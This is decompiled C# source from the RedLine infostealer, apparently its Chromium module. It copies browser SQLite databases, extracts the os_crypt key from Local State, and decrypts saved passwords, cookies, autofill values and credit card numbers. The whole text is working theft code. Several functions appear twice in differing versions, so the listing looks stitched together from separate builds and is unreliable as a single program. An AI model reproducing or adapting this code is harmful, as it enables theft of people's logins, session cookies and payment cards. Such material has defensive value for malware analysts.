// Token: 0x060002E4 RID: 740 RVA: 0x0000E6C0 File Offset: 0x0000C8C0 private static LoginPair ReadData(SqlConnection manager, int row, string chromeKey) { LoginPair loginPair = new LoginPair(); try { if (manager.Fields.Contains("Password_value")) { loginPair.Host = manager.ParseValue(row, "Origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "Username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "Password_value"), chromeKey); } else if (manager.Fields.Contains("password_value")) { loginPair.Host = manager.ParseValue(row, "origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "password_value"), chromeKey); } } catch (Exception) { } finally { loginPair.Login = (string.IsNullOrWhiteSpace(loginPair.Login) ? "UNKNOWN" : loginPair.Login); loginPair.Password = (string.IsNullOrWhiteSpace(loginPair.Password) ? "UNKNOWN" : loginPair.Password); loginPair.Host = (string.IsNullOrWhiteSpace(loginPair.Host) ? "UNKNOWN" : loginPair.Host); } return(loginPair); }
private static string DecryptChromium(string chiperText, string localStatePath) { string str = string.Empty; try { str = chiperText.StartsWith("v10") ? ChromiumEngine.DecryptV10(localStatePath, chiperText) : DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser, (byte[])null).Trim(); } catch { } return(str); }
private static List <Cookie> EnumCook(string profilePath) { List <Cookie> cookieList = new List <Cookie>(); try { string str = Path.Combine(profilePath, "Cookies"); if (!File.Exists(str)) { return(cookieList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("cookies"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { Cookie cookie = (Cookie)null; try { cookie = new Cookie() { Host = sqlConnection.ParseValue(rowIndex, "host_key").Trim(), Http = sqlConnection.ParseValue(rowIndex, "httponly") == "1", Path = sqlConnection.ParseValue(rowIndex, "path").Trim(), Secure = sqlConnection.ParseValue(rowIndex, "secure") == "1", Expires = sqlConnection.ParseValue(rowIndex, "expires_utc").Trim(), Name = sqlConnection.ParseValue(rowIndex, "name").Trim(), Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "encrypted_value"), localStatePath) }; } catch { } if (cookie != null) { cookieList.Add(cookie); } } } catch { } return(cookieList); }
private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> creditCardList = new List <CreditCard>(); try { string str = Path.Combine(profilePath, "Web Data"); if (!File.Exists(str)) { return(creditCardList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("credit_cards"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { CreditCard creditCard = (CreditCard)null; try { creditCard = new CreditCard() { Holder = sqlConnection.ParseValue(rowIndex, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_year").Trim()), CardNumber = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "card_number_encrypted"), localStatePath) }; } catch { } if (creditCard != null) { creditCardList.Add(creditCard); } } } catch { } return(creditCardList); }
// Token: 0x060002E5 RID: 741 RVA: 0x0000E808 File Offset: 0x0000CA08 private static string DecryptChromium(string chiperText, string chromeKey) { string result = string.Empty; try { if (chiperText.StartsWith("v10") || chiperText.StartsWith("v11")) { result = ChromiumEngine.DecryptV10(chromeKey, chiperText); } else { result = DecryptHelper.DecryptBlob(chiperText, DataProtectionScope.CurrentUser, null).Trim(); } } catch (Exception value) { Console.WriteLine(value); } return(result); }
private static List <LoginPair> GetCredentials(string profilePath) { List <LoginPair> loginPairList = new List <LoginPair>(); try { string str = Path.Combine(profilePath, "Login Data"); if (!File.Exists(str)) { return(loginPairList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection manager = new SqlConnection(DecryptHelper.CreateTempCopy(str)); manager.ReadTable("logins"); for (int row = 0; row < manager.RowLength; ++row) { LoginPair loginPair = new LoginPair(); try { loginPair = ChromiumEngine.ReadData(manager, row, localStatePath); } catch { } if (loginPair.Login.IsNotNull <string>() && loginPair.Login != "UNKNOWN" && (loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")) { loginPairList.Add(loginPair); } } } catch { } return(loginPairList); }
private static LoginPair ReadData( SqlConnection manager, int row, string localStatePath) { LoginPair loginPair = new LoginPair(); try { loginPair.Host = manager.ParseValue(row, "origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "password_value"), localStatePath); } catch { } finally { loginPair.Login = string.IsNullOrEmpty(loginPair.Login) ? "UNKNOWN" : loginPair.Login; loginPair.Password = string.IsNullOrEmpty(loginPair.Password) ? "UNKNOWN" : loginPair.Password; loginPair.Host = string.IsNullOrEmpty(loginPair.Host) ? "UNKNOWN" : loginPair.Host; } return(loginPair); }
public static List <Browser> ParseBrowsers() { List <Browser> browserProfiles = new List <Browser>(); try { int countCompleted = 0; object locker = new object(); List <string> profile = ChromiumEngine.GetProfile(); foreach (string str1 in profile) { string rootPath = str1; new Thread((ThreadStart)(() => { Browser browser = new Browser(); try { string fullName = new FileInfo(rootPath).Directory.FullName; string str1 = rootPath.Contains(RedLine.Logic.Helpers.Constants.RoamingAppData) ? ChromiumEngine.GetRoamingName(fullName) : ChromiumEngine.GetLocalName(fullName); if (!string.IsNullOrEmpty(str1)) { string str2 = str1[0].ToString().ToUpper() + str1.Remove(0, 1); string name = ChromiumEngine.GetName(fullName); if (!string.IsNullOrEmpty(name)) { browser.Name = str2; browser.Profile = name; browser.Cookies = (IList <Cookie>)ChromiumEngine.EnumCook(fullName).IsNull <List <Cookie> >(); browser.Credentials = (IList <LoginPair>)ChromiumEngine.GetCredentials(fullName).IsNull <List <LoginPair> >(); browser.Autofills = (IList <Autofill>)ChromiumEngine.EnumFills(fullName).IsNull <List <Autofill> >(); browser.CreditCards = (IList <CreditCard>)ChromiumEngine.EnumCC(fullName).IsNull <List <CreditCard> >(); } } } catch { } lock (locker) { IList <Cookie> cookies = browser.Cookies; if ((cookies != null ? (cookies.Count > 0 ? 1 : 0) : 0) == 0) { IList <LoginPair> credentials = browser.Credentials; if ((credentials != null ? (credentials.Count > 0 ? 1 : 0) : 0) == 0) { IList <CreditCard> creditCards = browser.CreditCards; if ((creditCards != null ? (creditCards.Count > 0 ? 1 : 0) : 0) == 0) { IList <Autofill> autofills = browser.Autofills; if ((autofills != null ? (autofills.Count > 0 ? 1 : 0) : 0) == 0) { goto label_11; } } } } browserProfiles.Add(browser); label_11: ++countCompleted; } })).Start(); } while (countCompleted != profile.Count) { ; } } catch { } return(browserProfiles); }
// Token: 0x060002E3 RID: 739 RVA: 0x0000E458 File Offset: 0x0000C658 private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> list = new List <CreditCard>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text3)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text2 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text2)) { text2 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text2)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text2, out flag); text3 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("credit_cards"); for (int i = 0; i < sqlConnection.RowLength; i++) { CreditCard creditCard = null; try { string text5 = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(i, "card_number_encrypted"), text3).Replace(" ", string.Empty); creditCard = new CreditCard { Holder = sqlConnection.ParseValue(i, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_year").Trim()), CardNumber = text5, CardType = DecryptHelper.DetectCreditCardType(text5) }; } catch { } if (creditCard != null) { list.Add(creditCard); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }
// Token: 0x060002E2 RID: 738 RVA: 0x0000E228 File Offset: 0x0000C428 private static List <Autofill> EnumFills(string profilePath) { List <Autofill> list = new List <Autofill>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text2)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text3 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text3)) { text3 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text3)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text3, out flag); text2 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("autofill"); for (int i = 0; i < sqlConnection.RowLength; i++) { Autofill autofill = null; try { string text5 = sqlConnection.ParseValue(i, "value").Trim(); if (text5.StartsWith("v10") || text5.StartsWith("v11")) { text5 = ChromiumEngine.DecryptChromium(text5, text2); } autofill = new Autofill { Name = sqlConnection.ParseValue(i, "name").Trim(), Value = text5 }; } catch { } if (autofill != null) { list.Add(autofill); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }
// Token: 0x060002DF RID: 735 RVA: 0x0000DA38 File Offset: 0x0000BC38 public static List <Browser> ParseBrowsers(IList <string> profiles) { List <Browser> list = new List <Browser>(); try { object obj = new object(); foreach (string text in profiles) { bool flag = false; int num = 1; while (!flag) { Browser browser = new Browser(); string dataFolder = string.Empty; string text2 = string.Empty; try { dataFolder = new FileInfo(text).Directory.FullName; if (dataFolder.Contains("Opera GX Stable")) { text2 = "Opera GX"; } else { text2 = (text.Contains(Constants.RoamingAppData) ? ChromiumEngine.GetRoamingName(dataFolder) : ChromiumEngine.GetLocalName(dataFolder)); } if (!string.IsNullOrEmpty(text2)) { text2 = text2[0].ToString().ToUpper() + text2.Remove(0, 1); string name = ChromiumEngine.GetName(dataFolder); if (!string.IsNullOrEmpty(name)) { browser.Name = text2; browser.Profile = name; browser.Credentials = ChromiumEngine.MakeTries <List <LoginPair> >(() => ChromiumEngine.GetCredentials(dataFolder), (List <LoginPair> x) => x.Count > 0).IsNull <List <LoginPair> >(); browser.Cookies = ChromiumEngine.MakeTries <List <Cookie> >(() => ChromiumEngine.EnumCook(dataFolder), (List <Cookie> x) => x.Count > 0).IsNull <List <Cookie> >(); browser.Autofills = ChromiumEngine.MakeTries <List <Autofill> >(() => ChromiumEngine.EnumFills(dataFolder), (List <Autofill> x) => x.Count > 0).IsNull <List <Autofill> >(); browser.CreditCards = ChromiumEngine.MakeTries <List <CreditCard> >(() => ChromiumEngine.EnumCC(dataFolder), (List <CreditCard> x) => x.Count > 0).IsNull <List <CreditCard> >(); } } } catch (Exception) { } object obj2 = obj; lock (obj2) { IList <Cookie> cookies = browser.Cookies; if (cookies == null || cookies.Count <= 0) { IList <LoginPair> credentials = browser.Credentials; if (credentials == null || credentials.Count <= 0) { IList <CreditCard> creditCards = browser.CreditCards; if (creditCards == null || creditCards.Count <= 0) { IList <Autofill> autofills = browser.Autofills; if (autofills == null || autofills.Count <= 0) { num++; goto IL_280; } } } } flag = true; list.Add(browser); IL_280 :; } if (num > 2) { flag = true; } } } } catch { } return(list); }
// Token: 0x060002E1 RID: 737 RVA: 0x0000DF4C File Offset: 0x0000C14C private static List <Cookie> EnumCook(string profilePath) { List <Cookie> list = new List <Cookie>(); try { string text = Path.Combine(profilePath, "Cookies"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text2)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text3 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text3)) { text3 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text3)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text3, out flag); text2 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("cookies"); string fieldName = sqlConnection.Fields.Contains("is_secure") ? "is_secure" : "secure"; sqlConnection.Fields.Contains("is_httponly"); for (int i = 0; i < sqlConnection.RowLength; i++) { Cookie cookie = null; try { cookie = new Cookie { Host = sqlConnection.ParseValue(i, "host_key").Trim(), Http = sqlConnection.ParseValue(i, "host_key").Trim().StartsWith("."), Path = sqlConnection.ParseValue(i, "path").Trim(), Secure = (sqlConnection.ParseValue(i, fieldName) == "1"), Expires = Convert.ToInt64(sqlConnection.ParseValue(i, "expires_utc").Trim()) / 1000000L - 11644473600L, Name = sqlConnection.ParseValue(i, "name").Trim(), Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(i, "encrypted_value"), text2) }; } catch { } if (cookie != null) { list.Add(cookie); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }
// Token: 0x060002E0 RID: 736 RVA: 0x0000DD64 File Offset: 0x0000BF64 private static List <LoginPair> GetCredentials(string profilePath) { List <LoginPair> list = new List <LoginPair>(); try { string text = Path.Combine(profilePath, "Login Data"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text2)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text3 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text3)) { text3 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text3)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text3, out flag); text2 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("logins"); for (int i = 0; i < sqlConnection.RowLength; i++) { LoginPair loginPair = new LoginPair(); try { loginPair = ChromiumEngine.ReadData(sqlConnection, i, text2); } catch { } if (loginPair.Password != "UNKNOWN") { list.Add(loginPair); } } } catch (Exception) { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }